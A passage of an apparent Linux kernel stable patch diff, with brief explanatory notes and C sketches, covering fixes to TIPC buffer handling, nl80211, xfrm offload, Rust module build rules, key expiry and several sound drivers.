+ 	} else {
+@@ -179,7 +184,6 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
+ 		*headbuf = NULL;
+ 		return 1;
+ 	}
+-	*buf = NULL;
+ 	return 0;
+ err:
+ 	kfree_skb(*buf);
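
The tipc_buf_append() fix above tightens buffer ownership: the caller's *buf reference stays set while the caller still owns the fragment (so the shared error path can free it), and is cleared exactly when ownership is handed off, preventing both the leak and the double free. A sketch of the hand-off rule, with a hypothetical consumer:

#include <linux/skbuff.h>

/* Hypothetical consumer of *pskb. Keep *pskb set while the caller still
 * owns the buffer so a shared error path may free it; clear it exactly
 * at the ownership hand-off.
 */
static int example_append(struct sk_buff **pskb, struct sk_buff_head *q)
{
	struct sk_buff *skb = *pskb;

	if (skb_linearize(skb))
		return -ENOMEM;		/* caller still owns and frees *pskb */

	*pskb = NULL;			/* ownership transfers below */
	skb_queue_tail(q, skb);		/* the queue now owns the buffer */
	return 0;
}
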
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 1a3bd554e2586..a00df7b89ca86 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -13802,6 +13802,8 @@ static int nl80211_set_coalesce(struct sk_buff *skb, struct genl_info *info)
+ error:
+ 	for (i = 0; i < new_coalesce.n_rules; i++) {
+ 		tmp_rule = &new_coalesce.rules[i];
++		if (!tmp_rule)
++			continue;
+ 		for (j = 0; j < tmp_rule->n_patterns; j++)
+ 			kfree(tmp_rule->patterns[j].mask);
+ 		kfree(tmp_rule->patterns);
+diff --git a/net/wireless/trace.h b/net/wireless/trace.h
+index a405c3edbc47e..cb5c3224e038a 100644
+--- a/net/wireless/trace.h
++++ b/net/wireless/trace.h
+@@ -1018,7 +1018,7 @@ TRACE_EVENT(rdev_get_mpp,
+ TRACE_EVENT(rdev_dump_mpp,
+ 	TP_PROTO(struct wiphy *wiphy, struct net_device *netdev, int _idx,
+ 		 u8 *dst, u8 *mpp),
+-	TP_ARGS(wiphy, netdev, _idx, mpp, dst),
++	TP_ARGS(wiphy, netdev, _idx, dst, mpp),
+ 	TP_STRUCT__entry(
+ 		WIPHY_ENTRY
+ 		NETDEV_ENTRY
+diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c
+index d0320e35accbf..4bba890ff3bc0 100644
+--- a/net/xfrm/xfrm_input.c
++++ b/net/xfrm/xfrm_input.c
+@@ -388,11 +388,15 @@ static int xfrm_prepare_input(struct xfrm_state *x, struct sk_buff *skb)
+  */
+ static int xfrm4_transport_input(struct xfrm_state *x, struct sk_buff *skb)
+ {
++	struct xfrm_offload *xo = xfrm_offload(skb);
+ 	int ihl = skb->data - skb_transport_header(skb);
+ 
+ 	if (skb->transport_header != skb->network_header) {
+ 		memmove(skb_transport_header(skb),
+ 			skb_network_header(skb), ihl);
++		if (xo)
++			xo->orig_mac_len =
++				skb_mac_header_was_set(skb) ? skb_mac_header_len(skb) : 0;
+ 		skb->network_header = skb->transport_header;
+ 	}
+ 	ip_hdr(skb)->tot_len = htons(skb->len + ihl);
+@@ -403,11 +407,15 @@ static int xfrm4_transport_input(struct xfrm_state *x, struct sk_buff *skb)
+ static int xfrm6_transport_input(struct xfrm_state *x, struct sk_buff *skb)
+ {
+ #if IS_ENABLED(CONFIG_IPV6)
++	struct xfrm_offload *xo = xfrm_offload(skb);
+ 	int ihl = skb->data - skb_transport_header(skb);
+ 
+ 	if (skb->transport_header != skb->network_header) {
+ 		memmove(skb_transport_header(skb),
+ 			skb_network_header(skb), ihl);
++		if (xo)
++			xo->orig_mac_len =
++				skb_mac_header_was_set(skb) ? skb_mac_header_len(skb) : 0;
+ 		skb->network_header = skb->transport_header;
+ 	}
+ 	ipv6_hdr(skb)->payload_len = htons(skb->len + ihl -
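
The xfrm_input hunks above record the original L2 header length before transport-mode input collapses the headers, so the GRO resubmit path can rebuild the full header, VLAN tags included, rather than a bare ethernet one. The recorded value amounts to:

#include <linux/skbuff.h>

/* Sketch of the bookkeeping added above: the full mac header length
 * (ethernet plus any vlan tags), or 0 if no mac header was set.
 */
static unsigned int example_orig_mac_len(const struct sk_buff *skb)
{
	return skb_mac_header_was_set(skb) ? skb_mac_header_len(skb) : 0;
}
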
+diff --git a/rust/Makefile b/rust/Makefile
+index 7700d3853404e..6d0c0e9757f21 100644
+--- a/rust/Makefile
++++ b/rust/Makefile
+@@ -322,10 +322,9 @@ $(obj)/exports_kernel_generated.h: $(obj)/kernel.o FORCE
+ quiet_cmd_rustc_procmacro = $(RUSTC_OR_CLIPPY_QUIET) P $@
+       cmd_rustc_procmacro = \
+ 	$(RUSTC_OR_CLIPPY) $(rust_common_flags) \
+-		--emit=dep-info,link --extern proc_macro \
+-		--crate-type proc-macro --out-dir $(objtree)/$(obj) \
++		--emit=dep-info=$(depfile) --emit=link=$@ --extern proc_macro \
++		--crate-type proc-macro \
+ 		--crate-name $(patsubst lib%.so,%,$(notdir $@)) $<; \
+-	mv $(objtree)/$(obj)/$(patsubst lib%.so,%,$(notdir $@)).d $(depfile); \
+ 	sed -i '/^\#/d' $(depfile)
+ 
+ # Procedural macros can only be used with the `rustc` that compiled it.
+@@ -339,10 +338,10 @@ quiet_cmd_rustc_library = $(if $(skip_clippy),RUSTC,$(RUSTC_OR_CLIPPY_QUIET)) L
+ 	OBJTREE=$(abspath $(objtree)) \
+ 	$(if $(skip_clippy),$(RUSTC),$(RUSTC_OR_CLIPPY)) \
+ 		$(filter-out $(skip_flags),$(rust_flags) $(rustc_target_flags)) \
+-		--emit=dep-info,obj,metadata --crate-type rlib \
+-		--out-dir $(objtree)/$(obj) -L$(objtree)/$(obj) \
++		--emit=dep-info=$(depfile) --emit=obj=$@ \
++		--emit=metadata=$(dir $@)$(patsubst %.o,lib%.rmeta,$(notdir $@)) \
++		--crate-type rlib -L$(objtree)/$(obj) \
+ 		--crate-name $(patsubst %.o,%,$(notdir $@)) $<; \
+-	mv $(objtree)/$(obj)/$(patsubst %.o,%,$(notdir $@)).d $(depfile); \
+ 	sed -i '/^\#/d' $(depfile) \
+ 	$(if $(rustc_objcopy),;$(OBJCOPY) $(rustc_objcopy) $@)
+ 
+diff --git a/rust/kernel/error.rs b/rust/kernel/error.rs
+index 466b2a8fe569b..4a3a6306cfe19 100644
+--- a/rust/kernel/error.rs
++++ b/rust/kernel/error.rs
+@@ -25,7 +25,7 @@ pub mod code {
+ 
+ impl Error {
+     /// Returns the kernel error code.
+-    pub fn to_kernel_errno(self) -> core::ffi::c_int {
++    pub fn to_errno(self) -> core::ffi::c_int {
+         self.0
+     }
+ }
+diff --git a/rust/kernel/lib.rs b/rust/kernel/lib.rs
+index abd46261d3855..43cf5f6bde9c2 100644
+--- a/rust/kernel/lib.rs
++++ b/rust/kernel/lib.rs
+@@ -37,7 +37,7 @@
+ /// The top level entrypoint to implementing a kernel module.
+ ///
+ /// For any teardown or cleanup operations, your type may implement [`Drop`].
+-pub trait Module: Sized + Sync {
++pub trait Module: Sized + Sync + Send {
+     /// Called at module initialization time.
+     ///
+     /// Use this method to perform whatever setup or registration your module
+diff --git a/rust/macros/module.rs b/rust/macros/module.rs
+index 186a5b8be23cd..031028b3dc41b 100644
+--- a/rust/macros/module.rs
++++ b/rust/macros/module.rs
+@@ -179,17 +179,6 @@ pub(crate) fn module(ts: TokenStream) -> TokenStream {
+             /// Used by the printing macros, e.g. [`info!`].
+             const __LOG_PREFIX: &[u8] = b\"{name}\\0\";
+ 
+-            /// The \"Rust loadable module\" mark, for `scripts/is_rust_module.sh`.
+-            //
+-            // This may be best done another way later on, e.g. as a new modinfo
+-            // key or a new section. For the moment, keep it simple.
+-            #[cfg(MODULE)]
+-            #[doc(hidden)]
+-            #[used]
+-            static __IS_RUST_MODULE: () = ();
+-
+-            static mut __MOD: Option<{type_}> = None;
+-
+             // SAFETY: `__this_module` is constructed by the kernel at load time and will not be
+             // freed until the module is unloaded.
+             #[cfg(MODULE)]
+@@ -201,76 +190,132 @@ pub(crate) fn module(ts: TokenStream) -> TokenStream {
+                 kernel::ThisModule::from_ptr(core::ptr::null_mut())
+             }};
+ 
+-            // Loadable modules need to export the `{{init,cleanup}}_module` identifiers.
+-            #[cfg(MODULE)]
+-            #[doc(hidden)]
+-            #[no_mangle]
+-            pub extern \"C\" fn init_module() -> core::ffi::c_int {{
+-                __init()
+-            }}
+-
+-            #[cfg(MODULE)]
+-            #[doc(hidden)]
+-            #[no_mangle]
+-            pub extern \"C\" fn cleanup_module() {{
+-                __exit()
+-            }}
++            // Double nested modules, since then nobody can access the public items inside.
++            mod __module_init {{
++                mod __module_init {{
++                    use super::super::{type_};
++
++                    /// The \"Rust loadable module\" mark.
++                    //
++                    // This may be best done another way later on, e.g. as a new modinfo
++                    // key or a new section. For the moment, keep it simple.
++                    #[cfg(MODULE)]
++                    #[doc(hidden)]
++                    #[used]
++                    static __IS_RUST_MODULE: () = ();
++
++                    static mut __MOD: Option<{type_}> = None;
++
++                    // Loadable modules need to export the `{{init,cleanup}}_module` identifiers.
++                    /// # Safety
++                    ///
++                    /// This function must not be called after module initialization, because it may be
++                    /// freed after that completes.
++                    #[cfg(MODULE)]
++                    #[doc(hidden)]
++                    #[no_mangle]
++                    #[link_section = \".init.text\"]
++                    pub unsafe extern \"C\" fn init_module() -> core::ffi::c_int {{
++                        // SAFETY: This function is inaccessible to the outside due to the double
++                        // module wrapping it. It is called exactly once by the C side via its
++                        // unique name.
++                        unsafe {{ __init() }}
++                    }}
+ 
+-            // Built-in modules are initialized through an initcall pointer
+-            // and the identifiers need to be unique.
+-            #[cfg(not(MODULE))]
+-            #[cfg(not(CONFIG_HAVE_ARCH_PREL32_RELOCATIONS))]
+-            #[doc(hidden)]
+-            #[link_section = \"{initcall_section}\"]
+-            #[used]
+-            pub static __{name}_initcall: extern \"C\" fn() -> core::ffi::c_int = __{name}_init;
++                    #[cfg(MODULE)]
++                    #[doc(hidden)]
++                    #[no_mangle]
++                    pub extern \"C\" fn cleanup_module() {{
++                        // SAFETY:
++                        // - This function is inaccessible to the outside due to the double
++                        //   module wrapping it. It is called exactly once by the C side via its
++                        //   unique name,
++                        // - furthermore it is only called after `init_module` has returned `0`
++                        //   (which delegates to `__init`).
++                        unsafe {{ __exit() }}
++                    }}
+ 
+-            #[cfg(not(MODULE))]
+-            #[cfg(CONFIG_HAVE_ARCH_PREL32_RELOCATIONS)]
+-            core::arch::global_asm!(
+-                r#\".section \"{initcall_section}\", \"a\"
+-                __{name}_initcall:
+-                    .long   __{name}_init - .
+-                    .previous
+-                \"#
+-            );
++                    // Built-in modules are initialized through an initcall pointer
++                    // and the identifiers need to be unique.
++                    #[cfg(not(MODULE))]
++                    #[cfg(not(CONFIG_HAVE_ARCH_PREL32_RELOCATIONS))]
++                    #[doc(hidden)]
++                    #[link_section = \"{initcall_section}\"]
++                    #[used]
++                    pub static __{name}_initcall: extern \"C\" fn() -> core::ffi::c_int = __{name}_init;
++
++                    #[cfg(not(MODULE))]
++                    #[cfg(CONFIG_HAVE_ARCH_PREL32_RELOCATIONS)]
++                    core::arch::global_asm!(
++                        r#\".section \"{initcall_section}\", \"a\"
++                        __{name}_initcall:
++                            .long   __{name}_init - .
++                            .previous
++                        \"#
++                    );
++
++                    #[cfg(not(MODULE))]
++                    #[doc(hidden)]
++                    #[no_mangle]
++                    pub extern \"C\" fn __{name}_init() -> core::ffi::c_int {{
++                        // SAFETY: This function is inaccessible to the outside due to the double
++                        // module wrapping it. It is called exactly once by the C side via its
++                        // placement above in the initcall section.
++                        unsafe {{ __init() }}
++                    }}
+ 
+-            #[cfg(not(MODULE))]
+-            #[doc(hidden)]
+-            #[no_mangle]
+-            pub extern \"C\" fn __{name}_init() -> core::ffi::c_int {{
+-                __init()
+-            }}
++                    #[cfg(not(MODULE))]
++                    #[doc(hidden)]
++                    #[no_mangle]
++                    pub extern \"C\" fn __{name}_exit() {{
++                        // SAFETY:
++                        // - This function is inaccessible to the outside due to the double
++                        //   module wrapping it. It is called exactly once by the C side via its
++                        //   unique name,
++                        // - furthermore it is only called after `__{name}_init` has returned `0`
++                        //   (which delegates to `__init`).
++                        unsafe {{ __exit() }}
++                    }}
+ 
+-            #[cfg(not(MODULE))]
+-            #[doc(hidden)]
+-            #[no_mangle]
+-            pub extern \"C\" fn __{name}_exit() {{
+-                __exit()
+-            }}
++                    /// # Safety
++                    ///
++                    /// This function must only be called once.
++                    unsafe fn __init() -> core::ffi::c_int {{
++                        match <{type_} as kernel::Module>::init(&super::super::THIS_MODULE) {{
++                            Ok(m) => {{
++                                // SAFETY: No data race, since `__MOD` can only be accessed by this
++                                // module and there only `__init` and `__exit` access it. These
++                                // functions are only called once and `__exit` cannot be called
++                                // before or during `__init`.
++                                unsafe {{
++                                    __MOD = Some(m);
++                                }}
++                                return 0;
++                            }}
++                            Err(e) => {{
++                                return e.to_errno();
++                            }}
++                        }}
++                    }}
+ 
+-            fn __init() -> core::ffi::c_int {{
+-                match <{type_} as kernel::Module>::init(&THIS_MODULE) {{
+-                    Ok(m) => {{
++                    /// # Safety
++                    ///
++                    /// This function must
++                    /// - only be called once,
++                    /// - be called after `__init` has been called and returned `0`.
++                    unsafe fn __exit() {{
++                        // SAFETY: No data race, since `__MOD` can only be accessed by this module
++                        // and there only `__init` and `__exit` access it. These functions are only
++                        // called once and `__init` was already called.
+                         unsafe {{
+-                            __MOD = Some(m);
++                            // Invokes `drop()` on `__MOD`, which should be used for cleanup.
++                            __MOD = None;
+                         }}
+-                        return 0;
+-                    }}
+-                    Err(e) => {{
+-                        return e.to_kernel_errno();
+                     }}
+-                }}
+-            }}
+ 
+-            fn __exit() {{
+-                unsafe {{
+-                    // Invokes `drop()` on `__MOD`, which should be used for cleanup.
+-                    __MOD = None;
++                    {modinfo}
+                 }}
+             }}
+-
+-            {modinfo}
+         ",
+         type_ = info.type_,
+         name = info.name,
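
For contrast with the generated Rust above: init_module() and cleanup_module() are the same entry points a C module defines through the usual macros, with the contract the Rust safety comments spell out (init runs once at load, exit runs once after a successful init). A minimal C skeleton, illustrative only:

#include <linux/init.h>
#include <linux/module.h>

static int __init example_init(void)
{
	return 0;	/* a negative errno here aborts the load */
}

static void __exit example_exit(void)
{
	/* teardown; only reached if example_init() returned 0 */
}

module_init(example_init);
module_exit(example_exit);
MODULE_LICENSE("GPL");
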
+diff --git a/scripts/Makefile.build b/scripts/Makefile.build
+index 41f3602fc8de7..1827bc1db1e98 100644
+--- a/scripts/Makefile.build
++++ b/scripts/Makefile.build
+@@ -277,17 +277,20 @@ $(obj)/%.lst: $(src)/%.c FORCE
+ 
+ rust_allowed_features := core_ffi_c
+ 
++# `--out-dir` is required to avoid temporaries being created by `rustc` in the
++# current working directory, which may not be accessible in the out-of-tree
++# modules case.
+ rust_common_cmd = \
+ 	RUST_MODFILE=$(modfile) $(RUSTC_OR_CLIPPY) $(rust_flags) \
+ 	-Zallow-features=$(rust_allowed_features) \
+ 	-Zcrate-attr=no_std \
+ 	-Zcrate-attr='feature($(rust_allowed_features))' \
+ 	--extern alloc --extern kernel \
+-	--crate-type rlib --out-dir $(obj) -L $(objtree)/rust/ \
+-	--crate-name $(basename $(notdir $@))
++	--crate-type rlib -L $(objtree)/rust/ \
++	--crate-name $(basename $(notdir $@)) \
++	--out-dir $(dir $@) --emit=dep-info=$(depfile)
+ 
+ rust_handle_depfile = \
+-	mv $(obj)/$(basename $(notdir $@)).d $(depfile); \
+ 	sed -i '/^\#/d' $(depfile)
+ 
+ # `--emit=obj`, `--emit=asm` and `--emit=llvm-ir` imply a single codegen unit
+@@ -300,7 +303,7 @@ rust_handle_depfile = \
+ 
+ quiet_cmd_rustc_o_rs = $(RUSTC_OR_CLIPPY_QUIET) $(quiet_modtag) $@
+       cmd_rustc_o_rs = \
+-	$(rust_common_cmd) --emit=dep-info,obj $<; \
++	$(rust_common_cmd) --emit=obj=$@ $<; \
+ 	$(rust_handle_depfile)
+ 
+ $(obj)/%.o: $(src)/%.rs FORCE
+@@ -308,7 +311,7 @@ $(obj)/%.o: $(src)/%.rs FORCE
+ 
+ quiet_cmd_rustc_rsi_rs = $(RUSTC_OR_CLIPPY_QUIET) $(quiet_modtag) $@
+       cmd_rustc_rsi_rs = \
+-	$(rust_common_cmd) --emit=dep-info -Zunpretty=expanded $< >$@; \
++	$(rust_common_cmd) -Zunpretty=expanded $< >$@; \
+ 	command -v $(RUSTFMT) >/dev/null && $(RUSTFMT) $@; \
+ 	$(rust_handle_depfile)
+ 
+@@ -317,7 +320,7 @@ $(obj)/%.rsi: $(src)/%.rs FORCE
+ 
+ quiet_cmd_rustc_s_rs = $(RUSTC_OR_CLIPPY_QUIET) $(quiet_modtag) $@
+       cmd_rustc_s_rs = \
+-	$(rust_common_cmd) --emit=dep-info,asm $<; \
++	$(rust_common_cmd) --emit=asm=$@ $<; \
+ 	$(rust_handle_depfile)
+ 
+ $(obj)/%.s: $(src)/%.rs FORCE
+@@ -325,7 +328,7 @@ $(obj)/%.s: $(src)/%.rs FORCE
+ 
+ quiet_cmd_rustc_ll_rs = $(RUSTC_OR_CLIPPY_QUIET) $(quiet_modtag) $@
+       cmd_rustc_ll_rs = \
+-	$(rust_common_cmd) --emit=dep-info,llvm-ir $<; \
++	$(rust_common_cmd) --emit=llvm-ir=$@ $<; \
+ 	$(rust_handle_depfile)
+ 
+ $(obj)/%.ll: $(src)/%.rs FORCE
+diff --git a/scripts/Makefile.host b/scripts/Makefile.host
+index da133780b7518..a447c91893de6 100644
+--- a/scripts/Makefile.host
++++ b/scripts/Makefile.host
+@@ -80,25 +80,28 @@ host-rust	:= $(addprefix $(obj)/,$(host-rust))
+ #####
+ # Handle options to gcc. Support building with separate output directory
+ 
+-_hostc_flags   = $(KBUILD_HOSTCFLAGS)   $(HOST_EXTRACFLAGS)   \
++hostc_flags    = -Wp,-MMD,$(depfile) \
++                 $(KBUILD_HOSTCFLAGS) $(HOST_EXTRACFLAGS) \
+                  $(HOSTCFLAGS_$(target-stem).o)
+-_hostcxx_flags = $(KBUILD_HOSTCXXFLAGS) $(HOST_EXTRACXXFLAGS) \
++hostcxx_flags  = -Wp,-MMD,$(depfile) \
++                 $(KBUILD_HOSTCXXFLAGS) $(HOST_EXTRACXXFLAGS) \
+                  $(HOSTCXXFLAGS_$(target-stem).o)
+-_hostrust_flags = $(KBUILD_HOSTRUSTFLAGS) $(HOST_EXTRARUSTFLAGS) \
+-                  $(HOSTRUSTFLAGS_$(target-stem))
++
++# `--out-dir` is required to avoid temporaries being created by `rustc` in the
++# current working directory, which may not be accessible in the out-of-tree
++# modules case.
++hostrust_flags = --out-dir $(dir $@) --emit=dep-info=$(depfile) \
++                 $(KBUILD_HOSTRUSTFLAGS) $(HOST_EXTRARUSTFLAGS) \
++                 $(HOSTRUSTFLAGS_$(target-stem))
+ 
+ # $(objtree)/$(obj) for including generated headers from checkin source files
+ ifeq ($(KBUILD_EXTMOD),)
+ ifdef building_out_of_srctree
+-_hostc_flags   += -I $(objtree)/$(obj)
+-_hostcxx_flags += -I $(objtree)/$(obj)
++hostc_flags   += -I $(objtree)/$(obj)
++hostcxx_flags += -I $(objtree)/$(obj)
+ endif
+ endif
+ 
+-hostc_flags    = -Wp,-MMD,$(depfile) $(_hostc_flags)
+-hostcxx_flags  = -Wp,-MMD,$(depfile) $(_hostcxx_flags)
+-hostrust_flags = $(_hostrust_flags)
+-
+ #####
+ # Compile programs on the host
+ 
+@@ -149,9 +152,7 @@ $(host-cxxobjs): $(obj)/%.o: $(src)/%.cc FORCE
+ # host-rust -> Executable
+ quiet_cmd_host-rust	= HOSTRUSTC $@
+       cmd_host-rust	= \
+-	$(HOSTRUSTC) $(hostrust_flags) --emit=dep-info,link \
+-		--out-dir=$(obj)/ $<; \
+-	mv $(obj)/$(target-stem).d $(depfile); \
++	$(HOSTRUSTC) $(hostrust_flags) --emit=link=$@ $<; \
+ 	sed -i '/^\#/d' $(depfile)
+ $(host-rust): $(obj)/%: $(src)/%.rs FORCE
+ 	$(call if_changed_dep,host-rust)
+diff --git a/scripts/Makefile.modfinal b/scripts/Makefile.modfinal
+index 3af5e5807983a..0faee3a477057 100644
+--- a/scripts/Makefile.modfinal
++++ b/scripts/Makefile.modfinal
+@@ -23,7 +23,7 @@ modname = $(notdir $(@:.mod.o=))
+ part-of-module = y
+ 
+ quiet_cmd_cc_o_c = CC [M]  $@
+-      cmd_cc_o_c = $(CC) $(filter-out $(CC_FLAGS_CFI) $(CFLAGS_GCOV), $(c_flags)) -c -o $@ $<
++      cmd_cc_o_c = $(CC) $(filter-out $(CC_FLAGS_CFI) $(CFLAGS_GCOV) $(CFLAGS_KCSAN), $(c_flags)) -c -o $@ $<
+ 
+ %.mod.o: %.mod.c FORCE
+ 	$(call if_changed_dep,cc_o_c)
+@@ -41,8 +41,6 @@ quiet_cmd_btf_ko = BTF [M] $@
+       cmd_btf_ko = 							\
+ 	if [ ! -f vmlinux ]; then					\
+ 		printf "Skipping BTF generation for %s due to unavailability of vmlinux\n" $@ 1>&2; \
+-	elif [ -n "$(CONFIG_RUST)" ] && $(srctree)/scripts/is_rust_module.sh $@; then 		\
+-		printf "Skipping BTF generation for %s because it's a Rust module\n" $@ 1>&2; \
+ 	else								\
+ 		LLVM_OBJCOPY="$(OBJCOPY)" $(PAHOLE) -J $(PAHOLE_FLAGS) --btf_base vmlinux $@; \
+ 		$(RESOLVE_BTFIDS) -b vmlinux $@; 			\
+diff --git a/scripts/is_rust_module.sh b/scripts/is_rust_module.sh
+deleted file mode 100755
+index 28b3831a7593f..0000000000000
+--- a/scripts/is_rust_module.sh
++++ /dev/null
+@@ -1,16 +0,0 @@
+-#!/bin/sh
+-# SPDX-License-Identifier: GPL-2.0
+-#
+-# is_rust_module.sh module.ko
+-#
+-# Returns `0` if `module.ko` is a Rust module, `1` otherwise.
+-
+-set -e
+-
+-# Using the `16_` prefix ensures other symbols with the same substring
+-# are not picked up (even if it would be unlikely). The last part is
+-# used just in case LLVM decides to use the `.` suffix.
+-#
+-# In the future, checking for the `.comment` section may be another
+-# option, see https://github.com/rust-lang/rust/pull/97550.
+-${NM} "$*" | grep -qE '^[0-9a-fA-F]+ r _R[^[:space:]]+16___IS_RUST_MODULE[^[:space:]]*$'
+diff --git a/security/keys/key.c b/security/keys/key.c
+index e65240641ca57..f2a84d86eab43 100644
+--- a/security/keys/key.c
++++ b/security/keys/key.c
+@@ -464,7 +464,8 @@ static int __key_instantiate_and_link(struct key *key,
+ 			if (authkey)
+ 				key_invalidate(authkey);
+ 
+-			key_set_expiry(key, prep->expiry);
++			if (prep->expiry != TIME64_MAX)
++				key_set_expiry(key, prep->expiry);
+ 		}
+ 	}
+ 
+diff --git a/sound/hda/intel-sdw-acpi.c b/sound/hda/intel-sdw-acpi.c
+index b57d72ea4503f..4e376994bf78b 100644
+--- a/sound/hda/intel-sdw-acpi.c
++++ b/sound/hda/intel-sdw-acpi.c
+@@ -41,6 +41,8 @@ static bool is_link_enabled(struct fwnode_handle *fw_node, u8 idx)
+ 				 "intel-quirk-mask",
+ 				 &quirk_mask);
+ 
++	fwnode_handle_put(link);
++
+ 	if (quirk_mask & SDW_INTEL_QUIRK_MASK_BUS_DISABLE)
+ 		return false;
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 77c40063d63a7..f0b939862a2a6 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9660,6 +9660,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x860f, "HP ZBook 15 G6", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x861f, "HP Elite Dragonfly G1", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x869d, "HP", ALC236_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x86c1, "HP Laptop 15-da3001TU", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x86c7, "HP Envy AiO 32", ALC274_FIXUP_HP_ENVY_GPIO),
+ 	SND_PCI_QUIRK(0x103c, 0x86e7, "HP Spectre x360 15-eb0xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+ 	SND_PCI_QUIRK(0x103c, 0x86e8, "HP Spectre x360 15-eb0xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+diff --git a/sound/soc/meson/Kconfig b/sound/soc/meson/Kconfig
+index b93ea33739f29..6458d5dc4902f 100644
+--- a/sound/soc/meson/Kconfig
++++ b/sound/soc/meson/Kconfig
+@@ -99,6 +99,7 @@ config SND_MESON_AXG_PDM
+ 
+ config SND_MESON_CARD_UTILS
+ 	tristate
++	select SND_DYNAMIC_MINORS
+ 
+ config SND_MESON_CODEC_GLUE
+ 	tristate
+diff --git a/sound/soc/meson/axg-card.c b/sound/soc/meson/axg-card.c
+index 2b77010c2c5ce..cbbaa55d92a66 100644
+--- a/sound/soc/meson/axg-card.c
++++ b/sound/soc/meson/axg-card.c
+@@ -320,6 +320,7 @@ static int axg_card_add_link(struct snd_soc_card *card, struct device_node *np,
+ 
+ 	dai_link->cpus = cpu;
+ 	dai_link->num_cpus = 1;
++	dai_link->nonatomic = true;
+ 
+ 	ret = meson_card_parse_dai(card, np, &dai_link->cpus->of_node,
+ 				   &dai_link->cpus->dai_name);
+diff --git a/sound/soc/meson/axg-fifo.c b/sound/soc/meson/axg-fifo.c
+index bccfb770b3391..94b169a5493b5 100644
+--- a/sound/soc/meson/axg-fifo.c
++++ b/sound/soc/meson/axg-fifo.c
+@@ -3,6 +3,7 @@
+ // Copyright (c) 2018 BayLibre, SAS.
+ // Author: Jerome Brunet <jbrunet@baylibre.com>
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/of_irq.h>
+ #include <linux/of_platform.h>
+@@ -145,8 +146,8 @@ int axg_fifo_pcm_hw_params(struct snd_soc_component *component,
+ 	/* Enable irq if necessary  */
+ 	irq_en = runtime->no_period_wakeup ? 0 : FIFO_INT_COUNT_REPEAT;
+ 	regmap_update_bits(fifo->map, FIFO_CTRL0,
+-			   CTRL0_INT_EN(FIFO_INT_COUNT_REPEAT),
+-			   CTRL0_INT_EN(irq_en));
++			   CTRL0_INT_EN,
++			   FIELD_PREP(CTRL0_INT_EN, irq_en));
+ 
+ 	return 0;
+ }
+@@ -176,9 +177,9 @@ int axg_fifo_pcm_hw_free(struct snd_soc_component *component,
+ {
+ 	struct axg_fifo *fifo = axg_fifo_data(ss);
+ 
+-	/* Disable the block count irq */
++	/* Disable irqs */
+ 	regmap_update_bits(fifo->map, FIFO_CTRL0,
+-			   CTRL0_INT_EN(FIFO_INT_COUNT_REPEAT), 0);
++			   CTRL0_INT_EN, 0);
+ 
+ 	return 0;
+ }
+@@ -187,13 +188,13 @@ EXPORT_SYMBOL_GPL(axg_fifo_pcm_hw_free);
+ static void axg_fifo_ack_irq(struct axg_fifo *fifo, u8 mask)
+ {
+ 	regmap_update_bits(fifo->map, FIFO_CTRL1,
+-			   CTRL1_INT_CLR(FIFO_INT_MASK),
+-			   CTRL1_INT_CLR(mask));
++			   CTRL1_INT_CLR,
++			   FIELD_PREP(CTRL1_INT_CLR, mask));
+ 
+ 	/* Clear must also be cleared */
+ 	regmap_update_bits(fifo->map, FIFO_CTRL1,
+-			   CTRL1_INT_CLR(FIFO_INT_MASK),
+-			   0);
++			   CTRL1_INT_CLR,
++			   FIELD_PREP(CTRL1_INT_CLR, 0));
+ }
+ 
+ static irqreturn_t axg_fifo_pcm_irq_block(int irq, void *dev_id)
+@@ -203,18 +204,26 @@ static irqreturn_t axg_fifo_pcm_irq_block(int irq, void *dev_id)
+ 	unsigned int status;
+ 
+ 	regmap_read(fifo->map, FIFO_STATUS1, &status);
++	status = FIELD_GET(STATUS1_INT_STS, status);
++	axg_fifo_ack_irq(fifo, status);
+ 
+-	status = STATUS1_INT_STS(status) & FIFO_INT_MASK;
++	/* Use the thread to call period elapsed on nonatomic links */
+ 	if (status & FIFO_INT_COUNT_REPEAT)
+-		snd_pcm_period_elapsed(ss);
+-	else
+-		dev_dbg(axg_fifo_dev(ss), "unexpected irq - STS 0x%02x\n",
+-			status);
++		return IRQ_WAKE_THREAD;
+ 
+-	/* Ack irqs */
+-	axg_fifo_ack_irq(fifo, status);
++	dev_dbg(axg_fifo_dev(ss), "unexpected irq - STS 0x%02x\n",
++		status);
++
++	return IRQ_NONE;
++}
++
++static irqreturn_t axg_fifo_pcm_irq_block_thread(int irq, void *dev_id)
++{
++	struct snd_pcm_substream *ss = dev_id;
++
++	snd_pcm_period_elapsed(ss);
+ 
+-	return IRQ_RETVAL(status);
++	return IRQ_HANDLED;
+ }
+ 
+ int axg_fifo_pcm_open(struct snd_soc_component *component,
+@@ -242,8 +251,9 @@ int axg_fifo_pcm_open(struct snd_soc_component *component,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = request_irq(fifo->irq, axg_fifo_pcm_irq_block, 0,
+-			  dev_name(dev), ss);
++	ret = request_threaded_irq(fifo->irq, axg_fifo_pcm_irq_block,
++				   axg_fifo_pcm_irq_block_thread,
++				   IRQF_ONESHOT, dev_name(dev), ss);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -254,15 +264,15 @@ int axg_fifo_pcm_open(struct snd_soc_component *component,
+ 
+ 	/* Setup status2 so it reports the memory pointer */
+ 	regmap_update_bits(fifo->map, FIFO_CTRL1,
+-			   CTRL1_STATUS2_SEL_MASK,
+-			   CTRL1_STATUS2_SEL(STATUS2_SEL_DDR_READ));
